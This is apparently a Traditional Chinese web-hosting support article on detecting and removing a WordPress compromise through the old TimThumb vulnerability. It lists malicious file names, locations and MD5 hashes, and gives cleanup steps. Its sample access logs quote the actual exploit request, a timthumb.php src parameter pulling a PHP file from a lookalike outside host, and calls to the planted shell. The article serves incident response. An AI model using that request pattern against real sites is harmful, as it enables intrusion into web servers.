WordPress 入侵:TimThumb

TimThumb 是 WordPress 主題及外掛程式用來調整圖像大小的工具。舊版 TimThumb 具有安全性漏洞,可讓攻擊者從其他網站上傳惡意 (「不良」) 檔案。第一項上傳的不良檔案可讓攻擊者繼續上傳其他惡意檔案到該主機帳戶內。

若想進一步得知有關入侵行為及相應處理措施的資訊,請參閱 如果我的網站遭到駭客入侵怎麼辦?

您已被入侵的徵兆

除了 如果我的網站遭到駭客入侵怎麼辦? 內提到的徵兆之外,若您帳戶內的外掛程式目錄中有具有以下模式的檔案,則您也能以此判斷您的網站已受此入侵行為影響。

  • external_[md5 雜湊].php — 如:external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 雜湊].php — 如:7eebe45bde5168488ac4010f0d65cea8.php

您可以在本文的已知的惡意檔案 MD5Sum 一節中瞭解可能的 md5 雜湊範例。

您也有可能在您網站的根目錄內看見以下的檔案 (更多資訊):

  • x.txt
  • logx.txt

救濟措施

您必須移除所有受入侵的檔案以及不良檔案。我們推薦您在刪除任何內容之前先為您的網站建立備份 (更多資訊)。

找出不良檔案

一開始透過 TimThumb 漏洞上傳的不良檔案通常都位在含有有漏洞的 TimThumb 檔案的 /theme/plugin 內的下列目錄內,

  • /tmp
  • /cache
  • /images

不良檔案位置範例:

[webroot]/wp-content/themes/[含有有漏洞的 TimThumb 的主題]/cache/images/

這些位置裡的不良檔案名稱範例

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

x.txtlogx.txt 檔案會含有不良檔案何時透過 TimThumb 漏洞建立,以及不良檔案在主機帳戶上的位置等資訊。這些資訊對判定甚麼檔案需要移除及這些檔案的位置來說十分重要。但是,這項檔案不太可能會列出所有需要移除的檔案。

範例:

日期:4 月 11 日星期四 2013 06:21:15 -0700
IP:X.X.X.X
瀏覽器:Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
網址:/wp-content/themes/[含有有漏洞的 TimThumb 的主題]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

勾選以移除

建立網站備份後,請移除以下檔案:

  • x.txt
  • logx.txt
  • external_[md5 雜湊].php — 如:external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 雜湊].php — 如:7eebe45bde5168488ac4010f0d65cea8.php
  • 其他在以 md5 雜湊命名的檔案內發現的惡意 PHP 檔案。

您可以透過 FTP (更多資訊) 或您主機帳戶控制面板中的檔案管理員 (更多資訊) 執行此操作。

您也應該:

  • 將您所有的主題及外掛程式升級到最新版。
  • 將所有 TimThumb.php 都換成這裡提供的最新版。

技術資訊

HTTP 紀錄範例

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

已知的惡意檔案 MD5SUM

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

其他惡意檔案

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

這篇文章有用嗎?
感謝您提供意見。 若要與客戶服務代表聯絡,請撥打支援中心電話號碼,或使用上方的對話選項。
很高興能幫上忙! 還有什麼可幫您的嗎?
很抱歉有這種情形。 請告訴我們您不了解的部分,或解決方案無法解決您問題的原因。